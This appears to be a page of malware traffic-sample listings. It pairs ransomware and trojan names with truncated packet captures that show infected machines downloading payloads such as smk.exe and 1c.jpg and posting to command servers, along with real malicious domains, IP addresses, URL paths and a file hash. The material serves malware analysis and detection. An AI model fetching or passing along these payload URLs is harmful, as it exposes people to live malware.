smk.exe systemswift.group Ransomware Malware Trojan Download PCAP file Download Traffic Sample

2019-05-30 00:27:40.790210 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3141076432:3141076852, ack 132281672, win 16425, length 420: HTTP: GET /smk.exe HTTP/1.1
E…..@….. . . . .. .P.9….uHP.@)D…
GET /smk.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:27:41.270451 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP
E…..@.@.DX . . . ..P. …..9.tP…+………………………………………………………………………………………………………………………………………………………………………………………………. ………………………………………………………………………………………………………………………………………………………………………………………………………………. ………………………………………………………………………………………………………………P.,…….00………… ………………..h……….. .. …. …. …….00…. ..%…………. […]

GET /sim.o t-trade.net Financial Stock Banking Malware Trojan PCAP file download sample

2019-05-29 21:16:12.610658 IP 10.1.10.162.60446 > 185.219.42.154.80: Flags [P.], seq 649603156:649603684, ack 3701990316, win 16425, length 528: HTTP: GET /sim.o HTTP/1.1
E..8w.@….. . …*….P&.(T….P.@)….
GET /sim.o HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Range: bytes=240615-
Unless-Modified-Since: Wed, 29 May 2019 23:56:47 GMT
If-Range: "10d200-58a0f88c11a17"
Host: t-trade.net
Connection: Keep-Alive

2019-05-29 21:16:36.990639 IP 10.1.10.162.60447 > 77.222.57.253.80: Flags [P.], seq 1839010927:1839011208, ack 1315819563, win 16425, length 281: HTTP: POST /index.php HTTP/1.1
E..Ax.@….m . .M.9….Pm..oNm.+P.@)/…
POST […]

POST /prosper/index.php evaglobal.eu prosper.exe Malware PCAP file download Traffic Sample

2019-05-30 00:41:38.457600 IP 10.1.10.162.49185 > 10.1.10.224.80: Flags [P.], seq 1430869096:1430869520, ack 1051603559, win 16425, length 424: HTTP: GET /prosper.exe HTTP/1.1
E…..@….. . . . ..!.PUITh>.2gP.@).$..
GET /prosper.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:42:14.087418 IP 10.1.10.162.49186 > 149.56.22.192.80: Flags [P.], seq 3640301184:3640301460, ack 3223405560, win 64240, length 276: HTTP: POST /prosper/index.php HTTP/1.1
E..<..@…8. . ..8…".P…..!C.P…….
POST /prosper/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT […]

copticorphans.org Ransomware Malware PCAP file download Traffic Sample

https://www.virustotal.com/fr/file/c7a14d6a1b72355952781787317f345753dab98c43b80127db2de62a89f0ce10/analysis/
SHA256: c7a14d6a1b72355952781787317f345753dab98c43b80127db2de62a89f0ce10
File name: 1c.jpg
Detection ratio: 32 / 72
Analysis date: 2019-05-29 14:27:51 UTC (16 hours, 28 minutes ago)

2019-05-29 21:44:21.090952 IP 10.1.10.162.49185 > 93.191.156.122.80: Flags [P.], seq 2960318675:2960319109, ack 288044427, win 16425, length 434: HTTP: GET /blogs/media/1c.jpg HTTP/1.1
E…..@….n . .]..z.!.P.r…+5.P.@)E…
GET /blogs/media/1c.jpg HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: vision4cph.com
Connection: Keep-Alive

2019-05-29 21:44:21.204625 IP 93.191.156.122.80 > 10.1.10.162.49185: […]

TROLDESH Ransomware PCAP Download Traffic Sample undergroundlabsuk.com 185.119.174.45

URLhaus Database: URLhaus tries to identify the malware associated with the payload served by a certain malware URL. In case URLhaus is able to identify the associated malware family, the payload will be tagged accordingly (field signature). The page below gives you an overview on payloads that URLhaus has identified as Ransomware.Troldesh.

2019-05-29 21:53:52.091291 IP 10.1.10.162.49184 > 185.119.174.45.80: Flags [P.], seq 1195198762:1195199227, ack 4032472939, win 16425, length 465: HTTP: GET /wp-content/themes/Divi/et-pagebuilder/1c.j HTTP/1.1
E…..@…{. . ..w.-. .PG=I*.Z.kP.@)….
GET /wp-content/themes/Divi/et-pagebuilder/1c.j HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; […]